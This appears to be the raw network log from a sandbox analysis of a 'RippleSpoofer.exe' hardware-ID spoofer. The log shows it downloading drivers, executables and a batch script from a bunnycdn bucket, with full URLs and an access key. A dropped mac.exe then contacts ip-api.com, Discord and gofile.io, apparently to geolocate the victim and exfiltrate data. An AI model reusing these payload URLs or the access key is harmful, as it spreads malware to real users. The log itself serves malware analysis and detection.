                                                                                      13.86.106.20.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      www.youtube.com
                                                                                      msedge.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      www.youtube.com
                                                                                      IN A
                                                                                      Response
                                                                                      www.youtube.com
                                                                                      IN CNAME
                                                                                      youtube-ui.l.google.com
                                                                                      youtube-ui.l.google.com
                                                                                      IN A
                                                                                      142.250.187.206
                                                                                      youtube-ui.l.google.com
                                                                                      IN A
                                                                                      142.250.178.14
                                                                                      youtube-ui.l.google.com
                                                                                      IN A
                                                                                      216.58.204.78
                                                                                      youtube-ui.l.google.com
                                                                                      IN A
                                                                                      142.250.180.14
                                                                                      youtube-ui.l.google.com
                                                                                      IN A
                                                                                      216.58.212.238
                                                                                      youtube-ui.l.google.com
                                                                                      IN A
                                                                                      142.250.200.46
                                                                                      youtube-ui.l.google.com
                                                                                      IN A
                                                                                      172.217.16.238
                                                                                      youtube-ui.l.google.com
                                                                                      IN A
                                                                                      142.250.200.14
                                                                                      youtube-ui.l.google.com
                                                                                      IN A
                                                                                      172.217.169.46
                                                                                      youtube-ui.l.google.com
                                                                                      IN A
                                                                                      216.58.212.206
                                                                                      youtube-ui.l.google.com
                                                                                      IN A
                                                                                      142.250.187.238
                                                                                      youtube-ui.l.google.com
                                                                                      IN A
                                                                                      172.217.169.14
                                                                                      youtube-ui.l.google.com
                                                                                      IN A
                                                                                      172.217.169.78
                                                                                      youtube-ui.l.google.com
                                                                                      IN A
                                                                                      216.58.201.110
                                                                                      youtube-ui.l.google.com
                                                                                      IN A
                                                                                      142.250.179.238
                                                                                    • flag-gb
                                                                                      GET
                                                                                      https://www.youtube.com/@ripple9
                                                                                      msedge.exe
                                                                                      Remote address:
                                                                                      142.250.187.206:443
                                                                                      Request
                                                                                      GET /@ripple9 HTTP/2.0
                                                                                      host: www.youtube.com
                                                                                      sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      dnt: 1
                                                                                      upgrade-insecure-requests: 1
                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                      accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                      sec-fetch-site: none
                                                                                      sec-fetch-mode: navigate
                                                                                      sec-fetch-user: ?1
                                                                                      sec-fetch-dest: document
                                                                                      accept-encoding: gzip, deflate, br
                                                                                      accept-language: en-US,en;q=0.9
                                                                                    • flag-us
                                                                                      DNS
                                                                                      consent.youtube.com
                                                                                      msedge.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      consent.youtube.com
                                                                                      IN A
                                                                                      Response
                                                                                      consent.youtube.com
                                                                                      IN A
                                                                                      142.250.179.238
                                                                                    • flag-gb
                                                                                      GET
                                                                                      https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2F%40ripple9%3Fcbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                                                                                      msedge.exe
                                                                                      Remote address:
                                                                                      142.250.179.238:443
                                                                                      Request
                                                                                      GET /m?continue=https%3A%2F%2Fwww.youtube.com%2F%40ripple9%3Fcbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1 HTTP/2.0
                                                                                      host: consent.youtube.com
                                                                                      dnt: 1
                                                                                      upgrade-insecure-requests: 1
                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                      accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                      sec-fetch-site: none
                                                                                      sec-fetch-mode: navigate
                                                                                      sec-fetch-user: ?1
                                                                                      sec-fetch-dest: document
                                                                                      sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      accept-encoding: gzip, deflate, br
                                                                                      accept-language: en-US,en;q=0.9
                                                                                      cookie: SOCS=CAAaBgiA-9S5Bg
                                                                                      cookie: YSC=Do4wY3o5ENo
                                                                                      cookie: __Secure-YEC=CgtBZS1qa0kteGw0QSiYgtW5BjIKCgJHQhIEGgAgIw%3D%3D
                                                                                      cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgIw%3D%3D
                                                                                    • flag-us
                                                                                      DNS
                                                                                      73.31.126.40.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      73.31.126.40.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      206.187.250.142.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      206.187.250.142.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                      206.187.250.142.in-addr.arpa
                                                                                      IN PTR
                                                                                      lhr25s33-in-f141e100net
                                                                                    • flag-us
                                                                                      DNS
                                                                                      238.179.250.142.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      238.179.250.142.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                      238.179.250.142.in-addr.arpa
                                                                                      IN PTR
                                                                                      lhr25s31-in-f141e100net
                                                                                    • flag-us
                                                                                      DNS
                                                                                      67.204.58.216.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      67.204.58.216.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                      67.204.58.216.in-addr.arpa
                                                                                      IN PTR
                                                                                      lhr48s49-in-f31e100net
                                                                                      67.204.58.216.in-addr.arpa
                                                                                      IN PTR
                                                                                      lhr25s13-in-f67�G
                                                                                      67.204.58.216.in-addr.arpa
                                                                                      IN PTR
                                                                                      lhr25s13-in-f3�G
                                                                                    • flag-us
                                                                                      DNS
                                                                                      10.180.250.142.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      10.180.250.142.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                      10.180.250.142.in-addr.arpa
                                                                                      IN PTR
                                                                                      lhr25s32-in-f101e100net
                                                                                    • flag-us
                                                                                      DNS
                                                                                      99.201.58.216.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      99.201.58.216.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                      99.201.58.216.in-addr.arpa
                                                                                      IN PTR
                                                                                      prg03s02-in-f991e100net
                                                                                      99.201.58.216.in-addr.arpa
                                                                                      IN PTR
                                                                                      lhr48s48-in-f3�H
                                                                                      99.201.58.216.in-addr.arpa
                                                                                      IN PTR
                                                                                      prg03s02-in-f3�H
                                                                                    • flag-us
                                                                                      DNS
                                                                                      www.google.com
                                                                                      msedge.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      www.google.com
                                                                                      IN A
                                                                                      Response
                                                                                      www.google.com
                                                                                      IN A
                                                                                      216.58.201.100
                                                                                    • flag-gb
                                                                                      GET
                                                                                      https://www.google.com/favicon.ico
                                                                                      msedge.exe
                                                                                      Remote address:
                                                                                      216.58.201.100:443
                                                                                      Request
                                                                                      GET /favicon.ico HTTP/2.0
                                                                                      host: www.google.com
                                                                                      sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                      dnt: 1
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                      sec-ch-ua-arch: "x86"
                                                                                      sec-ch-ua-full-version: "92.0.902.67"
                                                                                      sec-ch-ua-platform-version: "10.0"
                                                                                      sec-ch-ua-model:
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                      sec-fetch-site: cross-site
                                                                                      sec-fetch-mode: no-cors
                                                                                      sec-fetch-dest: image
                                                                                      referer: https://consent.youtube.com/
                                                                                      accept-encoding: gzip, deflate, br
                                                                                      accept-language: en-US,en;q=0.9
                                                                                    • flag-us
                                                                                      DNS
                                                                                      100.201.58.216.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      100.201.58.216.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                      100.201.58.216.in-addr.arpa
                                                                                      IN PTR
                                                                                      lhr48s48-in-f41e100net
                                                                                      100.201.58.216.in-addr.arpa
                                                                                      IN PTR
                                                                                      prg03s02-in-f100�H
                                                                                      100.201.58.216.in-addr.arpa
                                                                                      IN PTR
                                                                                      prg03s02-in-f4�H
                                                                                    • flag-us
                                                                                      DNS
                                                                                      200.163.202.172.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      200.163.202.172.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      198.187.3.20.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      198.187.3.20.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      107.12.20.2.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      107.12.20.2.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                      107.12.20.2.in-addr.arpa
                                                                                      IN PTR
                                                                                      a2-20-12-107deploystaticakamaitechnologiescom
                                                                                    • flag-us
                                                                                      DNS
                                                                                      storage.bunnycdn.com
                                                                                      RippleSpoofer.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      storage.bunnycdn.com
                                                                                      IN A
                                                                                      Response
                                                                                      storage.bunnycdn.com
                                                                                      IN A
                                                                                      109.61.89.55
                                                                                      storage.bunnycdn.com
                                                                                      IN A
                                                                                      109.61.89.53
                                                                                      storage.bunnycdn.com
                                                                                      IN A
                                                                                      185.59.220.194
                                                                                      storage.bunnycdn.com
                                                                                      IN A
                                                                                      109.61.89.54
                                                                                    • flag-de
                                                                                      GET
                                                                                      https://storage.bunnycdn.com/spongebob1/amigendrv64.sys?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download
                                                                                      RippleSpoofer.exe
                                                                                      Remote address:
                                                                                      109.61.89.55:443
                                                                                      Request
                                                                                      GET /spongebob1/amigendrv64.sys?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0
                                                                                      Host: storage.bunnycdn.com
                                                                                      Connection: Keep-Alive
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 14 Nov 2024 00:15:39 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 37040
                                                                                      Connection: keep-alive
                                                                                      Content-Disposition: attachment; filename=amigendrv64.sys
                                                                                      Pragma: no-cache
                                                                                      Last-Modified: Fri, 30 Aug 2024 18:45:16 GMT
                                                                                      ETag: "66d2133c-90b0"
                                                                                      Accept-Ranges: bytes
                                                                                    • flag-de
                                                                                      GET
                                                                                      https://storage.bunnycdn.com/spongebob1/amifldrv64.sys?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download
                                                                                      RippleSpoofer.exe
                                                                                      Remote address:
                                                                                      109.61.89.55:443
                                                                                      Request
                                                                                      GET /spongebob1/amifldrv64.sys?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0
                                                                                      Host: storage.bunnycdn.com
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 14 Nov 2024 00:15:39 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 19432
                                                                                      Connection: keep-alive
                                                                                      Content-Disposition: attachment; filename=amifldrv64.sys
                                                                                      Pragma: no-cache
                                                                                      Last-Modified: Fri, 30 Aug 2024 18:45:16 GMT
                                                                                      ETag: "66d2133c-4be8"
                                                                                      Accept-Ranges: bytes
                                                                                    • flag-de
                                                                                      GET
                                                                                      https://storage.bunnycdn.com/spongebob1/volumeid.EXE?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download
                                                                                      RippleSpoofer.exe
                                                                                      Remote address:
                                                                                      109.61.89.55:443
                                                                                      Request
                                                                                      GET /spongebob1/volumeid.EXE?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0
                                                                                      Host: storage.bunnycdn.com
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 14 Nov 2024 00:15:40 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 233640
                                                                                      Connection: keep-alive
                                                                                      Content-Disposition: attachment; filename=volumeid.EXE
                                                                                      Pragma: no-cache
                                                                                      Last-Modified: Fri, 30 Aug 2024 18:45:15 GMT
                                                                                      ETag: "66d2133b-390a8"
                                                                                      Accept-Ranges: bytes
                                                                                    • flag-de
                                                                                      GET
                                                                                      https://storage.bunnycdn.com/spongebob1/volumeid64.EXE?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download
                                                                                      RippleSpoofer.exe
                                                                                      Remote address:
                                                                                      109.61.89.55:443
                                                                                      Request
                                                                                      GET /spongebob1/volumeid64.EXE?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0
                                                                                      Host: storage.bunnycdn.com
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 14 Nov 2024 00:15:40 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 169648
                                                                                      Connection: keep-alive
                                                                                      Content-Disposition: attachment; filename=volumeid64.EXE
                                                                                      Pragma: no-cache
                                                                                      Last-Modified: Fri, 30 Aug 2024 18:45:16 GMT
                                                                                      ETag: "66d2133c-296b0"
                                                                                      Accept-Ranges: bytes
                                                                                    • flag-de
                                                                                      GET
                                                                                      https://storage.bunnycdn.com/spongebob1/randomizer.EXE?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download
                                                                                      RippleSpoofer.exe
                                                                                      Remote address:
                                                                                      109.61.89.55:443
                                                                                      Request
                                                                                      GET /spongebob1/randomizer.EXE?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0
                                                                                      Host: storage.bunnycdn.com
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 14 Nov 2024 00:15:40 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 5010465
                                                                                      Connection: keep-alive
                                                                                      Content-Disposition: attachment; filename=randomizer.EXE
                                                                                      Pragma: no-cache
                                                                                      Last-Modified: Mon, 02 Sep 2024 15:39:33 GMT
                                                                                      ETag: "66d5dc35-4c7421"
                                                                                      Accept-Ranges: bytes
                                                                                    • flag-de
                                                                                      GET
                                                                                      https://storage.bunnycdn.com/spongebob1/AMIDEWINx64.EXE?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download
                                                                                      RippleSpoofer.exe
                                                                                      Remote address:
                                                                                      109.61.89.55:443
                                                                                      Request
                                                                                      GET /spongebob1/AMIDEWINx64.EXE?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0
                                                                                      Host: storage.bunnycdn.com
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 14 Nov 2024 00:15:41 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 388720
                                                                                      Connection: keep-alive
                                                                                      Content-Disposition: attachment; filename=AMIDEWINx64.EXE
                                                                                      Pragma: no-cache
                                                                                      Last-Modified: Fri, 30 Aug 2024 18:45:16 GMT
                                                                                      ETag: "66d2133c-5ee70"
                                                                                      Accept-Ranges: bytes
                                                                                    • flag-de
                                                                                      GET
                                                                                      https://storage.bunnycdn.com/spongebob1/spoof.bat?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download
                                                                                      RippleSpoofer.exe
                                                                                      Remote address:
                                                                                      109.61.89.55:443
                                                                                      Request
                                                                                      GET /spongebob1/spoof.bat?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0
                                                                                      Host: storage.bunnycdn.com
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 14 Nov 2024 00:15:41 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 1908
                                                                                      Connection: keep-alive
                                                                                      Content-Disposition: attachment; filename=spoof.bat
                                                                                      Pragma: no-cache
                                                                                      Last-Modified: Fri, 30 Aug 2024 18:45:14 GMT
                                                                                      ETag: "66d2133a-774"
                                                                                      Accept-Ranges: bytes
                                                                                    • flag-de
                                                                                      GET
                                                                                      https://storage.bunnycdn.com/spongebob1/21902902190121290mc.exe?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download
                                                                                      RippleSpoofer.exe
                                                                                      Remote address:
                                                                                      109.61.89.55:443
                                                                                      Request
                                                                                      GET /spongebob1/21902902190121290mc.exe?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0
                                                                                      Host: storage.bunnycdn.com
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 14 Nov 2024 00:15:41 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 48640
                                                                                      Connection: keep-alive
                                                                                      Content-Disposition: attachment; filename=21902902190121290mc.exe
                                                                                      Pragma: no-cache
                                                                                      Last-Modified: Fri, 30 Aug 2024 18:45:16 GMT
                                                                                      ETag: "66d2133c-be00"
                                                                                      Accept-Ranges: bytes
                                                                                    • flag-de
                                                                                      GET
                                                                                      https://storage.bunnycdn.com/spongebob1/mac.exe?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download
                                                                                      RippleSpoofer.exe
                                                                                      Remote address:
                                                                                      109.61.89.55:443
                                                                                      Request
                                                                                      GET /spongebob1/mac.exe?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0
                                                                                      Host: storage.bunnycdn.com
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 14 Nov 2024 00:15:41 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 12177651
                                                                                      Connection: keep-alive
                                                                                      Content-Disposition: attachment; filename=mac.exe
                                                                                      Pragma: no-cache
                                                                                      Last-Modified: Mon, 02 Sep 2024 15:37:35 GMT
                                                                                      ETag: "66d5dbbf-b9d0f3"
                                                                                      Accept-Ranges: bytes
                                                                                    • flag-us
                                                                                      DNS
                                                                                      55.89.61.109.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      55.89.61.109.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                      55.89.61.109.in-addr.arpa
                                                                                      IN PTR
                                                                                      109-61-89-55 bunnyinfranet
                                                                                    • flag-us
                                                                                      DNS
                                                                                      ip-api.com
                                                                                      mac.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      ip-api.com
                                                                                      IN A
                                                                                      Response
                                                                                      ip-api.com
                                                                                      IN A
                                                                                      208.95.112.1
                                                                                    • flag-us
                                                                                      GET
                                                                                      http://ip-api.com/json
                                                                                      mac.exe
                                                                                      Remote address:
                                                                                      208.95.112.1:80
                                                                                      Request
                                                                                      GET /json HTTP/1.1
                                                                                      Host: ip-api.com
                                                                                      Accept: */*
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Python/3.11 aiohttp/3.10.5
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Date: Thu, 14 Nov 2024 00:15:45 GMT
                                                                                      Content-Type: application/json; charset=utf-8
                                                                                      Content-Length: 291
                                                                                      Access-Control-Allow-Origin: *
                                                                                      X-Ttl: 60
                                                                                      X-Rl: 44
                                                                                    • flag-us
                                                                                      DNS
                                                                                      1.112.95.208.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      1.112.95.208.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                      1.112.95.208.in-addr.arpa
                                                                                      IN PTR
                                                                                      ip-apicom
                                                                                    • flag-us
                                                                                      DNS
                                                                                      discord.com
                                                                                      mac.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      discord.com
                                                                                      IN A
                                                                                      Response
                                                                                      discord.com
                                                                                      IN A
                                                                                      162.159.135.232
                                                                                      discord.com
                                                                                      IN A
                                                                                      162.159.138.232
                                                                                      discord.com
                                                                                      IN A
                                                                                      162.159.137.232
                                                                                      discord.com
                                                                                      IN A
                                                                                      162.159.128.233
                                                                                      discord.com
                                                                                      IN A
                                                                                      162.159.136.232
                                                                                    • flag-us
                                                                                      DNS
                                                                                      232.135.159.162.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      232.135.159.162.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      api.gofile.io
                                                                                      mac.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      api.gofile.io
                                                                                      IN A
                                                                                      Response
                                                                                      api.gofile.io
                                                                                      IN A
                                                                                      45.112.123.126
                                                                                    • flag-us
                                                                                      DNS
                                                                                      store1.gofile.io
                                                                                      mac.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      store1.gofile.io
                                                                                      IN A
                                                                                      Response
                                                                                      store1.gofile.io
                                                                                      IN A
                                                                                      45.112.123.227
                                                                                    • flag-us
                                                                                      DNS
                                                                                      126.123.112.45.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      126.123.112.45.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      227.123.112.45.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      227.123.112.45.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      81.144.22.2.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      81.144.22.2.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                      81.144.22.2.in-addr.arpa
                                                                                      IN PTR
                                                                                      a2-22-144-81deploystaticakamaitechnologiescom
                                                                                    • flag-us
                                                                                      DNS
                                                                                      73.144.22.2.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      73.144.22.2.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                      73.144.22.2.in-addr.arpa
                                                                                      IN PTR
                                                                                      a2-22-144-73deploystaticakamaitechnologiescom
                                                                                    • flag-us
                                                                                      DNS
                                                                                      43.229.111.52.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      43.229.111.52.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      6.173.189.20.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      6.173.189.20.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • 162.125.64.18:443
                                                                                      https://www.dropbox.com/scl/fi/lymnqnkmq1u7j38npvuzz/version.json?rlkey=lmojv15nkp9kk5orfdpm4m5bs&st=usd8hokl&dl=1
                                                                                      tls, http
                                                                                      RippleSpoofer.exe
                                                                                      948 B
                                                                                      8.3kB
                                                                                      11
                                                                                      13

                                                                                      HTTP Request

                                                                                      GET https://www.dropbox.com/scl/fi/lymnqnkmq1u7j38npvuzz/version.json?rlkey=lmojv15nkp9kk5orfdpm4m5bs&st=usd8hokl&dl=1

                                                                                      HTTP Response

                                                                                      302
                                                                                    • 162.125.64.15:443
                                                                                      https://ucbd8a023e00d50d75466db2a13c.dl.dropboxusercontent.com/cd/0/get/CeUSPyov96jI3LX-7KVV55tzpPeHSZ9ZjmAL69xnzwr-qJ_rViK7XhZFjay5_M2F4p8ZDPPuEtwMpO4zeD7b3wAr6VCpZFqlw2zgh0Ts2T4gE7wVFDH2GsMDRTaDDf3hmlgLA7PR2koogtb7YRxmXoX6/file?dl=1
                                                                                      tls, http
                                                                                      RippleSpoofer.exe
                                                                                      1.1kB
                                                                                      5.6kB
                                                                                      10
                                                                                      11

                                                                                      HTTP Request

                                                                                      GET https://ucbd8a023e00d50d75466db2a13c.dl.dropboxusercontent.com/cd/0/get/CeUSPyov96jI3LX-7KVV55tzpPeHSZ9ZjmAL69xnzwr-qJ_rViK7XhZFjay5_M2F4p8ZDPPuEtwMpO4zeD7b3wAr6VCpZFqlw2zgh0Ts2T4gE7wVFDH2GsMDRTaDDf3hmlgLA7PR2koogtb7YRxmXoX6/file?dl=1

                                                                                      HTTP Response

                                                                                      200
                                                                                    • 142.250.187.206:443
                                                                                      https://www.youtube.com/@ripple9
                                                                                      tls, http2
                                                                                      msedge.exe
                                                                                      1.8kB
                                                                                      10.0kB
                                                                                      13
                                                                                      15

                                                                                      HTTP Request

                                                                                      GET https://www.youtube.com/@ripple9
                                                                                    • 142.250.179.238:443
                                                                                      https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2F%40ripple9%3Fcbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                                                                                      tls, http2
                                                                                      msedge.exe
                                                                                      2.4kB
                                                                                      66.7kB
                                                                                      23
                                                                                      55

                                                                                      HTTP Request

                                                                                      GET https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2F%40ripple9%3Fcbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                                                                                    • 216.58.201.100:443
                                                                                      https://www.google.com/favicon.ico
                                                                                      tls, http2
                                                                                      msedge.exe
                                                                                      1.8kB
                                                                                      7.8kB
                                                                                      12
                                                                                      12

                                                                                      HTTP Request

                                                                                      GET https://www.google.com/favicon.ico
                                                                                    • 109.61.89.55:443
                                                                                      https://storage.bunnycdn.com/spongebob1/mac.exe?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download
                                                                                      tls, http
                                                                                      RippleSpoofer.exe
                                                                                      432.2kB
                                                                                      19.0MB
                                                                                      6743
                                                                                      13691

                                                                                      HTTP Request

                                                                                      GET https://storage.bunnycdn.com/spongebob1/amigendrv64.sys?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download

                                                                                      HTTP Response

                                                                                      200

                                                                                      HTTP Request

                                                                                      GET https://storage.bunnycdn.com/spongebob1/amifldrv64.sys?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download

                                                                                      HTTP Response

                                                                                      200

                                                                                      HTTP Request

                                                                                      GET https://storage.bunnycdn.com/spongebob1/volumeid.EXE?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download

                                                                                      HTTP Response

                                                                                      200

                                                                                      HTTP Request

                                                                                      GET https://storage.bunnycdn.com/spongebob1/volumeid64.EXE?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download

                                                                                      HTTP Response

                                                                                      200

                                                                                      HTTP Request

                                                                                      GET https://storage.bunnycdn.com/spongebob1/randomizer.EXE?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download

                                                                                      HTTP Response

                                                                                      200

                                                                                      HTTP Request

                                                                                      GET https://storage.bunnycdn.com/spongebob1/AMIDEWINx64.EXE?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download

                                                                                      HTTP Response

                                                                                      200

                                                                                      HTTP Request

                                                                                      GET https://storage.bunnycdn.com/spongebob1/spoof.bat?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download

                                                                                      HTTP Response

                                                                                      200

                                                                                      HTTP Request

                                                                                      GET https://storage.bunnycdn.com/spongebob1/21902902190121290mc.exe?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download

                                                                                      HTTP Response

                                                                                      200

                                                                                      HTTP Request

                                                                                      GET https://storage.bunnycdn.com/spongebob1/mac.exe?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download

                                                                                      HTTP Response

